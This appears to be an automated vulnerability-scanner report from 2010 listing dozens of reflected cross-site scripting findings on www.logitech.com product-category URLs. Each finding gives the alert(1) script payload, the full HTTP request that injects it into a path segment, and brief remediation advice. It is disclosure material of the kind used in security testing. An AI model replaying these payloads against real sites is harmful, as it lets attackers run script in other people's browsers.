<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 149a1"><script>alert(1)</script>004187e8b96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices149a1"><script>alert(1)</script>004187e8b96/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8258d</script><script>alert(1)</script>301f254e8be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices8258d</script><script>alert(1)</script>301f254e8be/7585 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd034</script><script>alert(1)</script>9b6fad118fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/mice/devices/7585dd034</script><script>alert(1)</script>9b6fad118fe HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a90"><script>alert(1)</script>836ebc88c92 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/mice/devices/758512a90"><script>alert(1)</script>836ebc88c92 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3fb7"><script>alert(1)</script>3baa0edbbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa3fb7"><script>alert(1)</script>3baa0edbbb/mice-pointers/presenter HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84ae7</script><script>alert(1)</script>a1c4a1a5b37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /84ae7</script><script>alert(1)</script>a1c4a1a5b37/mice-pointers/presenter HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4a04"><script>alert(1)</script>b0a0f53f83b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersa4a04"><script>alert(1)</script>b0a0f53f83b/presenter HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a74e</script><script>alert(1)</script>b47f0dcdfe3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers8a74e</script><script>alert(1)</script>b47f0dcdfe3/presenter HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a08a</script><script>alert(1)</script>417c6913577 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/presenter3a08a</script><script>alert(1)</script>417c6913577 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9e1"><script>alert(1)</script>d5313d7642b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/presenter7f9e1"><script>alert(1)</script>d5313d7642b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5765</script><script>alert(1)</script>7739985dd82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a5765</script><script>alert(1)</script>7739985dd82/mice-pointers/trackballs HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f932f"><script>alert(1)</script>8540efada92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf932f"><script>alert(1)</script>8540efada92/mice-pointers/trackballs HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d60d9"><script>alert(1)</script>700fbc651e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointersd60d9"><script>alert(1)</script>700fbc651e5/trackballs HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95621</script><script>alert(1)</script>cf440c957c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers95621</script><script>alert(1)</script>cf440c957c1/trackballs HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f995</script><script>alert(1)</script>5c34a249261 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/mice-pointers/trackballs4f995</script><script>alert(1)</script>5c34a249261 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 690af"><script>alert(1)</script>f4b0f3fb990 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/mice-pointers/trackballs690af"><script>alert(1)</script>f4b0f3fb990 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc828"%3b43ade085a78 was submitted in the REST URL parameter 1. This input was echoed as fc828";43ade085a78 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usfc828"%3b43ade085a78/notebook-products HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d031"><script>alert(1)</script>d109ad84e0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us5d031"><script>alert(1)</script>d109ad84e0d/notebook-products HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:51:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1475f</script><script>alert(1)</script>c1cdaf58789 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1475f</script><script>alert(1)</script>c1cdaf58789/notebook-products HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9baae"><script>alert(1)</script>0a327a8f23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/notebook-products9baae"><script>alert(1)</script>0a327a8f23 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8b6a</script><script>alert(1)</script>9cda015854f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-productsb8b6a</script><script>alert(1)</script>9cda015854f HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 965c0</script><script>alert(1)</script>a99d469e971 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /965c0</script><script>alert(1)</script>a99d469e971/notebook-products/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc058"%3bf8ae85e54e8 was submitted in the REST URL parameter 1. This input was echoed as fc058";f8ae85e54e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-usfc058"%3bf8ae85e54e8/notebook-products/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 632e4"><script>alert(1)</script>27eea367a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us632e4"><script>alert(1)</script>27eea367a7d/notebook-products/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4f6d</script><script>alert(1)</script>25f061fae43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/notebook-productsb4f6d</script><script>alert(1)</script>25f061fae43/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d252"><script>alert(1)</script>af1002867b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/notebook-products1d252"><script>alert(1)</script>af1002867b1/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328a8"><script>alert(1)</script>a117a986152 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us328a8"><script>alert(1)</script>a117a986152/notebook-products/cooling-pads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46907</script><script>alert(1)</script>b69170b5602 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /46907</script><script>alert(1)</script>b69170b5602/notebook-products/cooling-pads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:15 GMT Connection: close
